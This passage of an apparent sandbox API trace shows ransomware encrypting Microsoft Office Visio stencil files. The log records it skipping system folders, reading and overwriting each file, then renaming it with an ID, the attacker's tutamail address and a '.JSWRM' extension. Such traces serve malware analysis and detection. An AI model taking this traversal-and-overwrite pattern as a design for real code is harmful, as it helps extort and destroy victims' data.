Content\\1033\\EEPATH_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.042] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f3541d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f3541d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f3541d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14aa7, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEPATH_U.VSSX", cAlternateFileName="EEPATH~3.VSS")) returned 1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2=".") returned 1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="..") returned 1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="...") returned 1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="windows") returned -1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="recovery") returned -1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="perflogs") returned -1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="documents and settings") returned 1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="system volume information") returned -1 [0148.042] lstrcmpiW (lpString1="EEPATH_U.VSSX", lpString2="msocache") returned -1 [0148.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.045] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=84647) returned 1 [0148.045] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.046] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14aa0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x14aa0, lpOverlapped=0x0) returned 1 [0148.054] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.054] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14aa0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x14aa0, lpOverlapped=0x0) returned 1 [0148.055] CloseHandle (hObject=0x314) returned 1 [0148.055] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.056] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x32e07e4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x32e07e4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x32e07e4, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xfe3b, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEPATH_VISIO2013_M.VSSX", cAlternateFileName="EEPATH~4.VSS")) returned 1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2=".") returned 1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="..") returned 1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="...") returned 1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="documents and settings") returned 1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0148.056] lstrcmpiW (lpString1="EEPATH_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0148.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x241330, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.057] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=65083) returned 1 [0148.057] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.058] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfe30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xfe30, lpOverlapped=0x0) returned 1 [0148.063] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.064] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfe30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xfe30, lpOverlapped=0x0) returned 1 [0148.064] CloseHandle (hObject=0x314) returned 1 [0148.064] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.065] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1702fda, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1702fda, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1729263, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf72f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEPATH_VISIO2013_U.VSSX", cAlternateFileName="EEPATH~1.VSS")) returned 1 [0148.065] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2=".") returned 1 [0148.065] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="..") returned 1 [0148.065] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="...") returned 1 [0148.065] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0148.065] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0148.065] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0148.066] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="documents and settings") returned 1 [0148.066] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.066] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0148.066] lstrcmpiW (lpString1="EEPATH_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0148.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x241038, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.068] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=63279) returned 1 [0148.068] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.068] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf720, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xf720, lpOverlapped=0x0) returned 1 [0148.074] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.074] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf720, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xf720, lpOverlapped=0x0) returned 1 [0148.074] CloseHandle (hObject=0x314) returned 1 [0148.075] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.076] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ae2d07, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ae2d07, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1ae2d07, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1294c, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEQUAL_M.VSSX", cAlternateFileName="EEQUAL~1.VSS")) returned 1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2=".") returned 1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="..") returned 1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="...") returned 1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="windows") returned -1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="recovery") returned -1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="perflogs") returned -1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="documents and settings") returned 1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="system volume information") returned -1 [0148.076] lstrcmpiW (lpString1="EEQUAL_M.VSSX", lpString2="msocache") returned -1 [0148.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.077] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=76108) returned 1 [0148.077] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.078] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12940, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12940, lpOverlapped=0x0) returned 1 [0148.090] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.090] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12940, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12940, lpOverlapped=0x0) returned 1 [0148.091] CloseHandle (hObject=0x314) returned 1 [0148.091] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.092] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3922ae8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3922ae8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3922ae8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x12218, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEQUAL_U.VSSX", cAlternateFileName="EEQUAL~4.VSS")) returned 1 [0148.092] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2=".") returned 1 [0148.092] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="..") returned 1 [0148.092] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="...") returned 1 [0148.092] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="windows") returned -1 [0148.093] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="recovery") returned -1 [0148.093] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="perflogs") returned -1 [0148.093] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="documents and settings") returned 1 [0148.093] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.093] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="system volume information") returned -1 [0148.093] lstrcmpiW (lpString1="EEQUAL_U.VSSX", lpString2="msocache") returned -1 [0148.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.094] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=74264) returned 1 [0148.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.094] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12210, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12210, lpOverlapped=0x0) returned 1 [0148.101] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.101] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12210, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12210, lpOverlapped=0x0) returned 1 [0148.102] CloseHandle (hObject=0x314) returned 1 [0148.102] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.103] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, 